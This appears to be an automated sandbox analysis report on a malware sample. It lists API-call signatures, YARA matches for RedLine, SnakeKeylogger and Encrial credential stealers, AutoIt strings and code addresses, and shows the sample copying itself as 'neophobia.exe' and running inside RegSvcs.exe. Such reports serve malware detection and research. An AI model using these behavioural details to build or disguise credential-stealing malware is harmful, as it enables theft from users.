Code function: 0_2_01004164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_01004164

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_01004164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		0_2_01004164
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DB4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_00DB4164

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_01003F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_01003F66

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FF001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00FF001C

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_0101CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		0_2_0101CABC
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DCCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		2_2_00DCCABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.neophobia.exe.b40000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.391e790.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.38f6458.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.2591b9e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.391e790.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.neophobia.exe.1490000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.2591b9e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.38f5570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.2590cb6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.2590cb6.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.38f6458.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.5710000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.neophobia.exe.2320000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.RegSvcs.exe.5710000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 11.2.RegSvcs.exe.38f5570.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.neophobia.exe.ba0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.1571996988.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000004.00000002.1531826494.0000000001490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000002.00000002.1495389103.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.1648249221.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 2352, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 6840, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00F93B3A
Source: 7b4Iaf58Rp.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 7b4Iaf58Rp.exe, 00000000.00000000.1415226274.0000000001044000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_219f5567-3
Source: 7b4Iaf58Rp.exe, 00000000.00000000.1415226274.0000000001044000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_768c5505-d
Source: 7b4Iaf58Rp.exe, 00000000.00000003.1452805193.0000000003573000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c6e76b6e-4
Source: 7b4Iaf58Rp.exe, 00000000.00000003.1452805193.0000000003573000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b4471c91-3
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: This is a third-party compiled AutoIt script.	2_2_00D43B3A
Source: neophobia.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: neophobia.exe, 00000002.00000000.1453118731.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f13f1f35-9
Source: neophobia.exe, 00000002.00000000.1453118731.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_be3dcafc-7
Source: neophobia.exe, 00000004.00000002.1531504461.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b65eb33a-4
Source: neophobia.exe, 00000004.00000002.1531504461.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_c7f3b326-7
Source: neophobia.exe, 00000006.00000000.1529739888.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d4075b23-6
Source: neophobia.exe, 00000006.00000000.1529739888.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_dbc91b03-9
Source: neophobia.exe, 0000000A.00000000.1601670765.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_507d38e0-c
Source: neophobia.exe, 0000000A.00000000.1601670765.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_5ef0dbd8-7
Source: 7b4Iaf58Rp.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e758b166-f
Source: 7b4Iaf58Rp.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_ee141584-0
Source: neophobia.exe.0.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cfb688c2-e
Source: neophobia.exe.0.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_45d22e7f-b

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FFA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00FFA1EF

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe

Code function: 0_2_00FE8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00FE8310

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FF51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		0_2_00FF51BD
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DA51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		2_2_00DA51BD

Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00F9E6A0	0_2_00F9E6A0
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FBD975	0_2_00FBD975
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00F9FCE0	0_2_00F9FCE0
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FB21C5	0_2_00FB21C5
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FC62D2	0_2_00FC62D2
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_010103DA	0_2_010103DA
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FC242E	0_2_00FC242E
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FB25FA	0_2_00FB25FA
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FA66E1	0_2_00FA66E1
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FEE616	0_2_00FEE616
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FC878F	0_2_00FC878F
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FF8889	0_2_00FF8889
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FC6844	0_2_00FC6844
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FA8808	0_2_00FA8808
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_01010857	0_2_01010857
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FBCB21	0_2_00FBCB21
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FC6DB6	0_2_00FC6DB6
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FA6F9E	0_2_00FA6F9E
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FA3030	0_2_00FA3030
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FBF1D9	0_2_00FBF1D9
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FB3187	0_2_00FB3187
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00F91287	0_2_00F91287
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FB1484	0_2_00FB1484
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FA5520	0_2_00FA5520
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FB7696	0_2_00FB7696
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FA5760	0_2_00FA5760
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FB1978	0_2_00FB1978
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FC9AB5	0_2_00FC9AB5
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_01017DDB	0_2_01017DDB
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FBBDA6	0_2_00FBBDA6
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FB1D90	0_2_00FB1D90
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00FA3FE0	0_2_00FA3FE0
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00F9DF00	0_2_00F9DF00
Source: C:\Users\user\Desktop\7b4Iaf58Rp.exe	Code function: 0_2_00CCA210	0_2_00CCA210
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D4E6A0	2_2_00D4E6A0
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D6D975	2_2_00D6D975
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D4FCE0	2_2_00D4FCE0
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D621C5	2_2_00D621C5
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D762D2	2_2_00D762D2
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DC03DA	2_2_00DC03DA
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D7242E	2_2_00D7242E
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D625FA	2_2_00D625FA
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D566E1	2_2_00D566E1
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D9E616	2_2_00D9E616
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D7878F	2_2_00D7878F
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DA8889	2_2_00DA8889
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DC0857	2_2_00DC0857
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D76844	2_2_00D76844
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D58808	2_2_00D58808
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D6CB21	2_2_00D6CB21
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D76DB6	2_2_00D76DB6
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D56F9E	2_2_00D56F9E
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D53030	2_2_00D53030
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D6F1D9	2_2_00D6F1D9
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D63187	2_2_00D63187
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D41287	2_2_00D41287
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D61484	2_2_00D61484
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D55520	2_2_00D55520
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D67696	2_2_00D67696
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D55760	2_2_00D55760
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D61978	2_2_00D61978
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D79AB5	2_2_00D79AB5
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00DC7DDB	2_2_00DC7DDB
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D61D90	2_2_00D61D90
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D6BDA6	2_2_00D6BDA6
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D53FE0	2_2_00D53FE0
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_00D4DF00	2_2_00D4DF00
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 2_2_012F4398	2_2_012F4398
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 4_2_01759970	4_2_01759970
Source: C:\Users\user\AppData\Local\scrolar\neophobia.exe	Code function: 6_2_0184A6A8	6_2_0184A6A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00408C60	7_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0040DC11	7_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00407C3F	7_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418CCC	7_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00406CA0	7_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004028B0	7_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0041A4BE	7_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418244	7_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00401650	7_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402F20	7_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00418788	7_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402F89	7_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_00402B90	7_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_004073A0	7_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DD5F2D	7_2_02DD5F2D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DD1448	7_2_02DD1448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DD1437	7_2_02DD1437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DD1199	7_2_02DD1199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02DD11A8	7_2_02DD11A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05758D70	7_2_05758D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0575B828	7_2_0575B828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_057521E8	7_2_057521E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05758D63	7_2_05758D63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0575F3A0	7_2_0575F3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0575F390	7_2_0575F390
